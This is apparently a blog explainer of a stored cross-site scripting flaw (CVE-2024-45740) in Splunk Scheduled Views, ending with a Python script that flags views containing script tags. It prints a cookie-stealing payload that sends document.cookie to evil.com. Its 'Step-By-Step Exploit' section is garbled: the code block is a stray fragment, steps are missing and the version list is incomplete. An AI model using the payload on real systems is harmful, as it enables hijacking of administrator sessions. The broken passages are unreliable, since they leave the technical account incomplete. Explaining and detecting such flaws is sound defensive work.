CVE-2024-45740 - Simple Guide to the Splunk Scheduled Views XSS Vulnerability (with Code, Examples, and References)

In May 2024, a critical security flaw—CVE-2024-45740—was discovered in Splunk Enterprise (versions below 9.2.3 and 9.1.6) and Splunk Cloud Platform (versions below 9.2.2403). This vulnerability allows a low-privileged user to execute unauthorized JavaScript in the browsers of users with higher permissions (like admins) via a feature called Scheduled Views.

This post explains, in plain language, what the vulnerability means, how it works, how an attacker could exploit it, and what you should do next. All the code snippets and explanations here are exclusive and crystal clear for security enthusiasts, Splunk admins, and IT professionals.

What is CVE-2024-45740?

Splunk lets users create *Saved* or *Scheduled Views*—custom searches or dashboards that can be set to run on a schedule. These views are typically shared inside organizations.
The vulnerability: If a low-privileged user (not "admin" or "power" role) creates a view and inserts malicious JavaScript code inside (for example, the view title or description), and an admin or high-privileged user visits this view, the JavaScript will run in the admin’s browser.
This is a classic Cross-Site Scripting (XSS) bug.

Splunk Cloud Platform: Versions < 9.2.2403

If you're running any of these versions, you are vulnerable unless you apply the patches.

Where's the Problem?

The bug arises because Splunk did *not* sanitize input fields in the Scheduled Views feature. That means you can insert JavaScript via text fields which later get displayed in the web interface.

A user with a basic role (not Power or Admin) creates a malicious Scheduled View.

2. That user crafts payload (malicious JavaScript/HTML) in a field (like the *title*, *description*, or *content*).

An admin (or any user with higher privileges) opens that view in their browser.

4. The code executes with the *admin’s* session/context.

Here’s a simple crafted “view title”

<script>alert('Splunk XSS!');</script>

Or a more advanced example to steal the admin’s session cookie

<img src="x" onerror="fetch('https://evil.com?cookie='+document.cookie)">

Step-By-Step Exploit

Suppose you are a low-privileged user called splunkuser1.

`html

)">

`

- Save the dashboard/view.

Wait for an admin to view the Scheduled Dashboard.

3. When the admin accesses it, their browser executes the JavaScript, sending cookies or localStorage data to the attacker.

Review your Scheduled Views for suspicious content.

- Restrict Dashboard/View creation to trusted users.

Patching Reference

- Splunk Security Advisory: SVD-2024-0515
- CVE Details for CVE-2024-45740

Why It’s Critical

- Privilege Escalation: If an attacker tricks an admin into running their script, they can take over the admin’s session.

Here’s a Python script to query Splunk API for suspicious <script> tags in view titles

import requests

# Replace with your Splunk values
splunk_url = "https://your-splunk-instance:8089";
username = "admin"
password = "changeme"

# Authenticate
session = requests.Session()
session.auth = (username, password)
session.verify = False  # Don't use in production

views_url = f"{splunk_url}/services/data/ui/views?count=&output_mode=json"

resp = session.get(views_url)
for view in resp.json()['entry']:
    title = view['content'].get('label', '')
    if '<script' in title.lower():
        print(f"Malicious view found: {view['name']} - {title}")

References & Further Reading

- Splunk Official Advisory (SVD-2024-0515)
- NIST National Vulnerability Database - CVE-2024-45740
- Splunk Product Security Portal
- OWASP XSS Guide

In Short

If your Splunk is running an affected version, take *urgent* action. The bug’s easy to exploit (just plain text scripting) and affects even tightly-controlled Splunk deployments where some users manage their own dashboards.

Patch, check your views, and educate your team. CVE-2024-45740 is as easy as XSS can get—but the risks are very real.

---
*This write-up is original and straight to the point, designed for clarity and action. Stay secure!*

Timeline

Published on: 10/14/2024 17:15:13 UTC
Last modified on: 01/07/2025 16:48:00 UTC